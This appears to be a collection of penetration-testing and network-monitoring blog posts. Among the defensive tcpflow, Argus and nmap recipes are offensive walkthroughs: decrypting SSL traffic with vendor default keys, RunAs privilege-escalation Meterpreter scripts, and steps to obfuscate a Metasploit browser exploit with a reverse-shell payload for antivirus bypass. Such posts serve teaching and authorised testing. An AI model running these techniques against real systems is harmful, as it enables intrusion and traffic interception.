Using default private keys to decrypt SSL streams

An old but hugely overlooked issue. Many appliance vendors ship their units with a default private key for SSL communications. Even if you reissue a new certificate, your appliance could still be using the same private key as everyone else's.. and it's typically bundled within the firmware packages publicly distributed by the application vendor. This affects everything from DD-WRT to enterprise class VPN appliances, tape libraries, and firewalls.

Well, someone has finally begun cataloguing these into a searchable database:
Just lookup the device in question, point the lookup tool to a running appliance, or feed it a packet capture or live network interface and it will provide any known private keys.

Once the private key is obtained, you can decrypt the SSL stream with tshark:

tshark -nn -t ad -r -o ssl.keys_list:,443,http,"" -V -R http

Note: For successful decryption, the initial full SSL handshake must be present in the capture. A full SSL handshake contains ClientHello, ServerHello, Certificate, ServerHelloDone. If you only see ClientHello, ServerHello, ChangeCipherspec, this is a continuation of a previously established SSL session and cannot be decrypted as is.


Meterpreter scripts for RunAs privilege escalation & other mischief

send_keystrokes.rb: Meterpreter script to interactively send keystrokes to an open application window using the vbscript SendKeys method. Can be used to escalate privileges into RunAs-invoked command shells on XP.

IE_click_run.rb: Meterpreter script to interactively click "Run" at the IE "File Download Security Warning" prompts. Can be used to escalate privileges into RunAs-invoked IE instances without end-user interaction on XP.

JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass

1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip:

Module options:

   Name        Current Setting  Required  Description
   ----            ---------------     --------  -----------
   SRVHOST      yes       The local host to listen on.
   SRVPORT     80                    yes       The local port to listen on.
   SSL             false                 no        Negotiate SSL for incoming connections
   SSLVersion  SSL3                 no        Specify the version of SSL that should be used
   URIPATH     /example          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     yes       The listen address
   LPORT     443                 yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:

wget --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"

4. View the HTML source and copy all JavaScript between the "script" tags.

5. Feed to a JavaScript obfuscator of your liking. Examples:


6. Copy obfuscated JS into a new HTML file.
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).

8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.

Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}

Thanks to Will Metcalf for pointing me in the right direction!



Introducing.. the Pwn Plug!

A SheevaPlug microserver loaded
with pentesting goodness!

    :: Preloaded with Ubuntu, Metasploit, Fasttrack, SET, SSLstrip, nmap, dsniff, netcat, nikto, nbtscan, xprobe2, inguma, scapy, ettercap, JTR, medusa, & more
    :: Maintains a reverse persistent SSH tunnel to your external pentest box, with support for tunneling over HTTP and ICMP
    :: Traverses strict egress firewall filters, webfilters, HTTP proxies, and application-aware firewalls
    :: Unpingable & no open ports in stealth mode
    :: 4.3 x 2.7 x 1.9 inches, 2.3 watts when idle
    :: 1.2GHz ARM cpu with 512M SDRAM, 512M flash HDD

Now selling through Rocket Bear Labs: http://www.rocketbearlabs.com/pwn-plug.html


Decoding OpenLDAP & IBM Directory Server password hashes

OpenLDAP {SHA} hashes are base64-encoded hex byte-arrays of the SHA hash. Example:
userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=

The original SHA hash can be extracted from this with the help of fdump (http://sourceforge.net/projects/fdump/files/):

echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -

IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:

userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==

The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:

echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-

FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:

echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'

This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!

Windows privilege escalation talk at first Defcon 802!

Slide deck is available here: http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf

DC802: http://dc802.org/?p=64


Windows Privilege Escalation Talk - BSides Boston

Presented on Saturday, April 24, 4pm @ Security BSides Boston:

# Title: Escalating privileges through Secondary Logon (RunAs) processes

# Abstract: The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..

Slide deck is available here: http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf

bSides Boston: http://www.securitybsides.com/BSidesBostonTalks


Forensics: Recovering a 12-year old floppy disk with DD

True story. Earlier this year I was handed a 12-year old floppy disk loaded with bad sectors and unmountable due to a missing/corrupted partition table. A lost cause? Nope. DD can still image the raw media, skipping unreadable sectors and padding the output file with zeros to keep file structures intact wherever possible.

I booted up a Helix Live CD and ran:
dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync

After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..


NSM: Parsing HTTP sessions with tcpflow

:: Show HTTP requests, replies, etc: tcpflow -i [interface] -c -s port 80 | grep HTTP
:: Show all readable HTTP strings: tcpflow -i [interface] -c -s port 80 | grep -v "\.\."
:: Save HTTP flows to local files: tcpflow -i [interface] -s port 80

NSM: PI detection with grep utils

Here's a simple way to monitor network traffic for compliance with state & federal privacy regulations. Monitoring is especially important on perimeter ISP links, where PI can be seen flying naked into the public Internet.. how embarrassing!

These Ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network:

:: Spaced SSNs: ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2]) \d{2} \d{4}(\s|$)'
:: Dashed SSNs: ngrep -d
[interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Dashed CCs (16-digit):
ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'
:: Non-spaced CCs  (16-digit): ngrep -d [interface] -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})\d{12}(\s|$)'

Storing unencrypted PI on disk is also a big no-no. Here's how to detect these:

:: Spaced/dashed SSNs: pcregrep -r "(\D?\W)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])( |-)\d{2}( |-)\d{4}\D" [folder/drive/network path to search]
:: Spaced/dashed CCs: pcregrep -r "(\D?\W)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})( |-)\d{4}( |-)\d{4}( |-)\d{4}\D" [folder/drive/network path to search]

NSM: Simple network change detection with nmap

I run this daily to see network adds/changes. MAC address changes are also detected, which is useful for spotting ARP cache poisoning and changes to system hardware. 

1. Create a baseline list of network hosts:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > baseline_hosts.txt
rm temp.txt

2. Then, save an updated list of hosts, and compare this against the baseline list:
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt
grep -v # temp.txt | grep -v "appears to be down" > current_hosts.txt
rm temp.txt
grep -v -x -F -f baseline_hosts.txt current_hosts.txt

NSM: Web/email traffic analysis with Bro-IDS

:: Top 10 email senders: grep "FROM: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 email recipients: grep "TO: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web browser/client apps: cat [Bro_http.log] | grep -i user-agent | cut -f6- -d' ' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 web servers (based on HTTP objects): cat [Bro_http.log] | grep "HOST: " | awk '{ print$5 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 DNS A-record queries: cat [Bro_dns.log] | grep "query ?A" | awk '{ print$6 }' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 HTTP server response codes: cat [Bro_http.log] | pcregrep -o '\(\d{3} "' | cut -c 2-5 | sort | uniq -c | sort -nr | head -n 10
:: HTTP POST/GET counts: cat [Bro_http.log] | pcregrep -o "POST|GET" | sort | uniq -c | sort -nr

NSM: Top 10s with Argus!

:: Top 10 web servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 80 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 FTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 21 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP servers: ra -nn -r [argus_file] -s daddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 SMTP clients: ra -nn -r [argus_file] -s saddr - tcp and dst port 25 | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 protocols: ra -n -r [argus_file] -s proto | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 TCP ports: ra -nn -r [argus_file] -s dport - tcp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 UDP ports: ra -nn -r [argus_file] -s dport - udp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10 
:: Top 10 source (client) IPs: ra -nn -r [argus_file] -s saddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 destination (server) IPs: ra -nn -r [argus_file] -s daddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10
:: Top 10 host-pairs: ra -nn -r [argus_file] -s proto saddr dir daddr | grep -v man | awk '{print$2$3$4}' | sort | uniq -c | sort -nr | head -n 10

NSM: SSL handshake analysis with ssldump

:: Total SSL Handshakes: ssldump -n -r [capture_file] | grep Handshake | wc -l
:: Total ClientHellos: ssldump -n -r [capture_file] | grep ClientHello | wc -l
:: List SSL versions negotiated: ssldump -n -r [capture_file] | grep Version | sort | uniq -c | sort -nr
:: List CipherSuites negotiated: ssldump -n -r [capture_file] | grep "cipherSuite" | sort | uniq -c | sort -nr
:: List ServerHello events: ssldump -n -r [capture_file] | grep "ServerHello" | sort | uniq -c | sort -nr
:: Total ChangeCipherSpec events: ssldump -n -r [capture_file] | grep ChangeCipherSpec | wc -l


Hardware Hacking: Ghetto wifi bridge

. 14dbi sector panel antenna with 500mw amp
. Standard bombay sapphire panel mount

. Gaping PC with red led fans